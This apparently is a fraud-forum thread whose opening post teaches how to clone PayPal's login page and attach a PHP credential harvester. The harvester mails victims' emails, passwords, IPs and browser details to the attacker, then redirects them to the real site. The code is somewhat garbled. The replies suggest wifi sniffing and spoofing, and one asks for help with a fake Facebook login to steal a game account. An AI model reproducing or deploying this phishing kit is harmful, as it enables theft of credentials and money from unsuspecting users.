How to make undetectable ScamPages

stormeus

***
24
Rep
393
Likes
Premium
Posts
497
Threads
386
Joined
May 2018
Sign Up or Login to view this post and enjoy everything our site has to offer!
Scam page is a fake webpage. e.g. a login of a popular website, online bank login and etc. depending on what it is. scam page are used by spammers to collect data on people who get scammed. detecting scam page is simple if you are technology oriented. but most common users can't detect scam page. this is a big problem in the www. some company are developing software to combat scam's or phishing scams - phishing is the term used for this scam.

1] OK, so first we choose a target. We chose www.paypal.com
2] Navigate the site chosen. Press CTRL + S and save the file. Html somewhere on your computer.
3] We open ... There might be a problem, namely the way the image.
4] If relative path (relative path is the path like / images / wow.gif) be transformed into an absolute path (http://tinta.com/images/wow.gif)
5] Now that you clarified your lead you to the file. Html that was saved, so your login type CTRL + F ... (Here the words are different .. try and password, password, username, etc.. Dak login does not work).
6] You have a code like . Login2.php change in 040147.php!
7] Now, the username should be a code like . name = "email" tells us that in PHP script authentication is the variable that you email username.
8] Good memory. The password, the code should be similar ( ). So, password is held in variable password. A and memorize it.
9] Now, where you have saved. Html, created a new file called 040147.php.

In it, add the following code:
PHP:
$ To = "your@email.com"
$ Name = $ _POST ['email'];
$ Email = $ _POST ['email'];
$ Subject = $ _POST ['subject'];
$ Password = $ _POST ['password'];
$ Agent = $ _SERVER ['HTTP_USER_AGENT'];
$ Ip = $ _SERVER ['REMOTE_ADDR'];
$ D = date ('l dS \ of F Y h: i: s A');
$ Sub = "New Account Hacked PayPal - $ email";
$ Headers = "From: $ name <$ email> \ n";
$ Headers .= "Content-Type: text / plain, charset = iso-8859-1 \ n";
$ Mes .= 'Username:'. $ Email. "\ N";
$ Msg .= "Password:". $ Password. "\ N";
$ Msg .= "Browser:". $ Agent. "\ N";
$ Msg .= "IP:". $ Ip. "\ N";
$ Mes .= 'Date and time:'. $ D;
(
mail ($ to, $ sub, $ mes, $ headers);
header ("Location: www.paypal.com");
)
?>
10] Change the email to yours. The code above variables over email and password and sends them together with some more useful details.
11] Rename. Or HTML into index.html. Php, you upload the 2 files on a host and entertain.

YOUR SCAMPAGE IS READY NOW. ENJOY SPAMMING ;)
 

azrael13

18
Rep
33
Likes
Carder
Posts
78
Threads
9
Joined
Apr 2020
Sign Up or Login to view this post and enjoy everything our site has to offer!
great tut to make a fake page
i recommend if your using this method try learning sniffing and spoofing then use it on public wifi's
 

Ceeksmbk

0
Rep
7
Likes
Carder
Posts
55
Threads
3
Joined
Apr 2020
Sign Up or Login to view this post and enjoy everything our site has to offer!
I want to learn spamming my tele @Res_sprk
 

JamesbOnd01

0
Rep
2
Likes
Carder
Posts
61
Threads
3
Joined
Aug 2020
Sign Up or Login to view this post and enjoy everything our site has to offer!
Hi, Can you please help me in creating fake login page of Facebook! I wanna access someones Pubg Account! 😁